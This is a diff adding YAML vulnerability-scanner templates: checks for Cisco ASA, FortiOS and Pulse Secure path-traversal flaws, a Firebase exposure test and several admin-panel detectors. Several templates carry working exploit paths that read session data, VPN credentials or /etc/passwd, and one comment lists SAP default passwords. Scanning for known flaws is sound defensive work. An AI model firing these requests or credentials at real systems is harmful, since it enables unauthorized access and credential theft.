diff --git a/cves/CVE-2018-0296.yaml b/cves/CVE-2018-0296.yaml
new file mode 100644
index 0000000000..70ef80af89
--- /dev/null
+++ b/cves/CVE-2018-0296.yaml
@@ -0,0 +1,22 @@
+id: CVE-2018-0296
+
+info:
+ name: Cisco ASA path traversal vulnerability
+ author: organiccrap
+ severity: medium
+ # https://github.com/yassineaboukir/CVE-2018-0296
+ # curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
+ # if vuln, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
+ matchers:
+ - type: word
+ words:
+ - "///sessions"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/CVE-2018-13379.yaml b/cves/CVE-2018-13379.yaml
new file mode 100644
index 0000000000..8a8e5a0982
--- /dev/null
+++ b/cves/CVE-2018-13379.yaml
@@ -0,0 +1,15 @@
+id: CVE-2018-13379
+
+info:
+ name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
+ author: organiccrap
+ severity: high
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+ matchers:
+ - type: word
+ words:
+ - "var fgt_lang ="
diff --git a/cves/CVE-2019-11510.yaml b/cves/CVE-2019-11510.yaml
new file mode 100644
index 0000000000..1db8007db7
--- /dev/null
+++ b/cves/CVE-2019-11510.yaml
@@ -0,0 +1,20 @@
+id: CVE-2019-11510
+
+info:
+ name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
+ author: organiccrap
+ severity: high
+ # https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
diff --git a/files/firebase-detect.yaml b/files/firebase-detect.yaml
new file mode 100644
index 0000000000..314fbfda28
--- /dev/null
+++ b/files/firebase-detect.yaml
@@ -0,0 +1,17 @@
+id: firebase-detect
+
+info:
+ name: firebase detect
+ author: organiccrap
+ severity: low
+ # http://ghostlulz.com/google-exposed-firebase-database/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
+ matchers:
+ - type: word
+ words:
+ - "Could not parse auth token"
+ part: body
diff --git a/panels/cisco-asa-panel.yaml b/panels/cisco-asa-panel.yaml
new file mode 100644
index 0000000000..e60fd53fbf
--- /dev/null
+++ b/panels/cisco-asa-panel.yaml
@@ -0,0 +1,16 @@
+id: cisco-asa-panel-detect
+
+info:
+ name: Cisco ASA VPN panel detect
+ author: organiccrap
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/+CSCOE+/logon.html"
+ matchers:
+ - type: word
+ words:
+ - "SSL VPN Service"
+ part: body
diff --git a/panels/grafana-detect.yaml b/panels/grafana-detect.yaml
new file mode 100644
index 0000000000..9f4b4e689a
--- /dev/null
+++ b/panels/grafana-detect.yaml
@@ -0,0 +1,16 @@
+id: grafana-detect
+
+info:
+ name: Grafana panel detect
+ author: organiccrap
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
+ matchers:
+ - type: word
+ words:
+ - "Grafana"
+ part: body
diff --git a/panels/sap-netweaver-detect.yaml b/panels/sap-netweaver-detect.yaml
new file mode 100644
index 0000000000..d9a4d6c688
--- /dev/null
+++ b/panels/sap-netweaver-detect.yaml
@@ -0,0 +1,17 @@
+id: sap-netweaver-portal-detect
+
+info:
+ name: SAP NetWeaver Portal detect
+ author: organiccrap
+ severity: low
+ # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/irj/portal"
+ matchers:
+ - type: word
+ words:
+ - "SAP NetWeaver Portal"
+ part: body
diff --git a/panels/supervpn-panel.yaml b/panels/supervpn-panel.yaml
new file mode 100644
index 0000000000..2124700c86
--- /dev/null
+++ b/panels/supervpn-panel.yaml
@@ -0,0 +1,16 @@
+id: supervpn-detect
+
+info:
+ name: SuperVPN panel detect
+ author: organiccrap
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin/login.html"
+ matchers:
+ - type: word
+ words:
+ - "Sign In-SuperVPN"
+ part: body